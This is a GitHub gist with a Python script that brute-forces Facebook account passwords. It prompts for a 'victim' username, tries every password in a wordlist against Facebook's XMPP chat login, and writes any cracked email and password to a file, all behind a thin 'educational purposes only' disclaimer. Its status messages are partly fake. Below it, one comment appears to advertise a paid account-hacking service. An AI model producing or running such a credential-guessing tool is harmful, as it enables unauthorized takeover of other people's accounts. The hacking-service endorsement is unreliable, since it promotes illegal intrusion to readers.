Last active
November 7, 2024 18:39
-
-
Save HossamYousef/070c805d947bd17c7a19 to your computer and use it in GitHub Desktop.
This simple script to penetrate accounts Facebook brute-force
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
#Install SleekXMPP & xmpppy Modules | |
#This program is not for children -(18) | |
#This program is only for educational purposes only. | |
#Don't Attack people facebook account's it's illegal ! | |
#If you want to HaCk into someone's account, you must have the permission of the user. | |
#usage:Facebook-brute-force.py [wordlist file] | |
#Coded By Hossam Youssef <[email protected]> ^_^ | |
import xmpp | |
import sys | |
import urllib,re | |
import time | |
import random | |
import datetime | |
def internet_on(): | |
try : | |
data = urllib.urlopen('https://www.google.com') | |
return True | |
except : | |
return False | |
if internet_on() == True: | |
print """ | |
\t _____ _____ _____ _ | |
\t| ___|| ___ \ / __ \ | | | |
\t| |_ | |_/ / ______ | / \/ _ __ __ _ ___ | | __ ___ _ __ | |
\t| _| | ___ \ |______| | | | '__| / _` | / __|| |/ / / _ \| '__| | |
\t| | | |_/ / | \__/\| | | (_| || (__ | < | __/| | | |
\t\_| \____/ \____/|_| \__,_| \___||_|\_\ \___||_| | |
# Private Ghost Password ^_^ | |
# Coded By Hossam Youssef :) | |
# Enjoy Cracking ^_^ | |
# usage: Facebook-brute-force.py [wordlist file] | |
""" | |
login = raw_input("Enter username of victim account : ") | |
password_list = open(sys.argv[1],"r") | |
_login=login+"@chat.facebook.com" | |
print "[+]Connecting To Facebook Terminal Server... " | |
print "[+]Connection Has Been Establishing Successfully To The Server..." | |
print "[+]Negotiating With The Protocol..." | |
print "[+]There was no error with Port..." | |
print "[+]You Are Successfully Connected Enj0y..." | |
print "[+]Attack Has Been Started Be Patient..." | |
for pwd in password_list: | |
sys.stdout.write(".") | |
sys.stdout.flush() | |
pwd=pwd.strip('\n') | |
jid = xmpp.protocol.JID(_login) | |
cl = xmpp.Client(jid.getDomain(), debug=[]) | |
if cl.connect(('chat.facebook.com',5222)): | |
print "!~Injecting Password~!" | |
else: | |
print "[+]Successed[+]" | |
print '[!]',pwd | |
if cl.auth(jid.getNode(), pwd): | |
cl.sendInitPresence() | |
print "[+] -> The Account Has Been Cracked ^__^ "," Password Found ==> : ",pwd | |
file = open(login+".txt", "w") | |
file.write("Email : " +login+ "@facebook.com\n") | |
file.write("Password : " +pwd+ "\n") | |
file.write(str(datetime.datetime.now())) | |
file.close() | |
break | |
cl.disconnect() | |
time.sleep(2) | |
else: | |
print "You have a problem to connect to the Internet :(" |
Jammy1997
commented
Nov 22, 2021
Thank you so much [email protected], you are so reliable at what you do and I am among the people that got the best services from you just yesterday I emailed you for a GMAIL hack and you came up with my results in less than 30min. All thanks to you once again.
it's a prank, I think
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment